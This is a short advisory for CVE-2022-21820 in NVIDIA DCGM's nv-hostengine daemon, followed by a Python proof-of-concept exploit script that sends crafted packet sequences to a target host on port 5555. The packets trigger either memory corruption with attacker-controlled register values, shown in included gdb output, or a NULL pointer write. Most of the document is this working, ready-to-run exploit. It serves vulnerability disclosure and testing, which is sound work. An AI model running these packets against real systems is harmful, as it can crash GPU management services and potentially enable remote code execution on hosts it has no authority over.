NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health data. nv-hostengine is a daemon that by default listens on the loopback interface, but can also listen on the network for requests coming in on port 5555 (remote mgmt). A native client named DCGMI allows users to make requests to the daemon to support a variety of functions. Malformed packets can cause the daemon (running as root or user account) to crash or potentially result in code execution. Versions less than 2.3.5 are affected.
advisories | CVE-2022-21820
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
#
# heart.py
#
# NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health
# data. nv-hostengine is a daemon that by default listens on the loopback interface,
# but can also listen on the network for requests coming in on port 5555 (remote mgmt).
# A native client named DCGMI allows users to make requests to the daemon to support
# a variety of functions. Malformed packets can cause the daemon (running as root
# or user account) to crash or potentially result in code execution.
#
# More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html
#
# Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)
#
# $ ./heart.py 10.0.0.201 --trigger pkt3_mem
#
# $ gdb `which nv-hostengine`
# (gdb) r -b ALL -n
# nv-hostengine running as non-root. Some functionality will be limited.
# Started host engine version 2.3.1 using port number: 5555
# ...
# Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.
#
# (gdb) i r
# rax 0x7ffbb3dbd010 140719031046160
# rbx 0x7ffff771ac70 140737344810096
# rcx 0x7ffbb3dbd010 140719031046160
# rdx 0x424242420 17786217504
# rsi 0x7ffff771aee4 140737344810724
# rdi 0x7ffbb3dbd010 140719031046160
# rbp 0x7ffff771ac40 0x7ffff771ac40
# rsp 0x7ffff771abe8 0x7ffff771abe8
# r8 0x424242420 17786217504
# r9 0x0 0
# r10 0x7ffbb3dbd010 140719031046160
#
# CVE-2022-21820
#
import os
import sys
import argparse
import time
import shutil
import signal
import socket
# TCP port the script connects to.
DEFAULT_PORT = 5555

# Leading marker bytes shared by every packet defined below.
PKT_START = b'\xad\xbc\xbc\xad'

# NOTE(review): in every packet below, the 4 bytes at offset 8 equal the
# little-endian length of the data that follows the first 20 bytes. This looks
# like a length field -- confirm against the protocol before editing payloads.

#
# Trigger #1: Memory Corruption via malformed packet 3
#
TRIGGER_ONE_PKT_1 = (
    PKT_START +
    b'\x01\x00\x00\x00\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x0f\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00'
)

TRIGGER_ONE_PKT_2 = (
    PKT_START +
    b'\x01\x00\x00\x00\x1a\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0a\x18\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00\x48\xa4\xec\xc4\x94\x81\x83\xf5\x02'
)

# 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420
TRIGGER_ONE_PKT_3 = (
    PKT_START +
    b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01\x00' +
    b'\x84' * 51 +
    b'\x00' * 488 +
    b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' +
    b'\x00' * 207 +
    b'\x01\x00\x00\x00'
)

#
# Trigger #2: NULL ptr write via malformed packet 4
#
TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1
TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2

TRIGGER_TWO_PKT_3 = (
    PKT_START +
    b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01' +
    b'\x00' * 12 +
    b'\x01\x00\x00\x00\x01' +
    b'\x00' * 523 +
    b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' +
    b'\x00' * 207 +
    b'\x01\x00\x00\x00'
)

# 0x79 triggers crash
TRIGGER_TWO_PKT_4 = (
    PKT_START +
    b'\x04\x00\x00\x00\x1c\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x1a\x08\x04\x10\x03\x18' +
    b'\xff' * 9 +
    b'\x01' +
    b'\x79' +
    b'\x00\x42\x07\xd2\x01\x04\x08\x03\x10\x00'
)
class Heart(object):
    """Connect to a host on DEFAULT_PORT and send a predefined packet sequence.

    The sequence is selected by ``args.trigger`` ('pkt3_mem' or 'pkt4_null').
    All methods report failure through a -1 / None return value and a printed
    message rather than by raising.
    """

    def __init__(self, args):
        """Store the target host and trigger name from the parsed arguments."""
        self.host = args.host
        self.trigger = args.trigger

    def run(self):
        """Send the selected packet sequence.

        Returns:
            0 on success, -1 if no trigger was chosen, the socket could not be
            created or connected, or a packet could not be sent.
        """
        if self.trigger is None:
            print("error: choose which bug use via --trigger")
            return -1

        sock = self.getSock()
        if sock is None:
            return -1

        # Packets are sent in order; an unknown trigger name sends nothing.
        sequences = {
            'pkt3_mem': (
                TRIGGER_ONE_PKT_1,
                TRIGGER_ONE_PKT_2,
                TRIGGER_ONE_PKT_3,
            ),
            'pkt4_null': (
                TRIGGER_TWO_PKT_1,
                TRIGGER_TWO_PKT_2,
                TRIGGER_TWO_PKT_3,
                TRIGGER_TWO_PKT_4,
            ),
        }

        # The context manager closes the socket on every exit path.
        with sock:
            try:
                sock.connect((self.host, DEFAULT_PORT))
            except (OSError, ValueError) as error:
                print("connect() failed: %s\n" % error)
                return -1

            for number, pkt in enumerate(sequences.get(self.trigger, ()), start=1):
                if self.sendPacket(sock, pkt) < 0:
                    print("failed to send/recv packet %d\n" % number)
                    return -1

        print("done\n")
        return 0

    def getSock(self):
        """Create a TCP/IPv4 socket with a 2 second timeout.

        Returns:
            The new socket, or None if it could not be created.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(2)
        except OSError as error:
            print("socket() failed: %s\n" % error)
            return None
        return sock

    def sendPacket(self, sock, pkt):
        """Send ``pkt`` in full, then try to read up to 256 bytes of reply.

        Returns:
            -1 if sending failed, otherwise 0. A failed or timed-out receive
            still counts as success.
        """
        try:
            # sendall() retries until the whole packet has been written.
            sock.sendall(pkt)
        except OSError as error:
            print("socket send error: %s\n" % error)
            return -1

        try:
            sock.recv(256)
        except OSError:
            # Deliberately ignored: no reply is expected for pkt3_mem.
            pass
        return 0
def signalExit(signum, frame):
    """Signal handler that ends the process via ``sys.exit(-1)``.

    Both arguments are required by the signal-handler signature and are unused.
    """
    sys.exit(-1)
def arg_parse(argv=None):
    """Parse the command line.

    Args:
        argv: Optional list of argument strings. When None, argparse reads
            ``sys.argv[1:]``, which is the original behaviour.

    Returns:
        The parsed namespace with ``host`` (str) and ``trigger`` (one of
        'pkt3_mem' / 'pkt4_null', or None when the option is omitted).
    """
    parser = argparse.ArgumentParser()

    parser.add_argument("host",
                        type=str,
                        help="target host")

    # The option string was previously listed twice; once is sufficient.
    parser.add_argument("--trigger",
                        type=str,
                        choices=['pkt3_mem', 'pkt4_null'],
                        help="which bug to trigger")

    return parser.parse_args(argv)
def main():
    """Script entry point: install the SIGINT handler, parse args and run.

    Exits with status -1 when ``Heart.run()`` reports failure.
    """
    signal.signal(signal.SIGINT, signalExit)

    args = arg_parse()
    rh = Heart(args)
    result = rh.run()

    # run() returns 0 on success and -1 on failure, so failure is "< 0";
    # the previous "> 0" check could never fire.
    if result < 0:
        sys.exit(-1)
# Run main() only when executed as a script, not when imported.
if __name__ == '__main__':
    main()